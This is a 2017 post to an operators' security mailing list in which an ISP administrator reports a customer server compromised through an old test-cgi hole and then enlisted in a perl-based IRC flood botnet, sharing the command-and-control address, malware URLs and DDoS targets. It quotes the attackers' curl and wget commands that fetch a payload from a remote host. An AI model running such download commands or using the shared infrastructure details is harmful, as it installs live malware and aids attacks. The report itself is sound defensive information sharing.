[nsp-sec] Linux botnet AS14061, 8218, 23118 (C&C), 6739 (target)

Wed Apr 12 15:36:54 EDT 2017

I had a customer's server hacked from 193.225.104.133 back on March 16th
via an old test-cgi exploit.  From there, the attackers download a shell
script called pop

which downloaded some perl scripts

curl -o /tmp/oka http://162.243.110.85/.xa/oka
wget http://162.243.110.85/.xa/oka -O /tmp/oka

which connects to what appears to be an IRC server at 69.77.154.110
I am guessing via IRC, it was told to downloaded another bot program
from 193.227.248.244 that reaches out to the same host for attack
information.

http://193.227.248.244/intranet/mdb

mdb is a perl program that does tcp/udp floods on demand getting
commands from 69.77.154.110.

Today's target were a series of IP addrs in Spain. UDP packets 35,000
bytes in size (lots o fragmentation) directed at
213.37.244.4
213.37.244.5
213.37.244.6
213.37.244.7
37.158.239.230

The attack today was April 12  14:23 UTC from the customer's IP
64.7.142.141. The customer box is cleaned up for now, so please do not
block.

The scripts are attached in the zip file.   You can pass on the scripts
as you see fit as well as the C&C info.

Note, the C&C has a bit of a delay on the initial connection. So an
impatient scanner will miss it. The first time it sees your tcp SYN, it
will not respond with a SYN ACK for 20 seconds. It seems to cache things
after that and allow connections normally...
the C&C IP (69.77.154.110) was hard coded into the perl script I found.

Thanks!

	---Mike

-- 
-------------------
Mike Tancsa, tel +1 519 651 3400
Sentex Communications, mike at sentex.net
Providing Internet services since 1994 www.sentex.net
Cambridge, Ontario Canada   http://www.tancsa.com/
-------------- next part --------------
A non-text attachment was scrubbed...
Name: hack.zip
Type: application/zip
Size: 20708 bytes
Desc: not available
URL: <https://puck.nether.net/mailman/private/nsp-security/attachments/20170412/901f3da1/attachment.zip>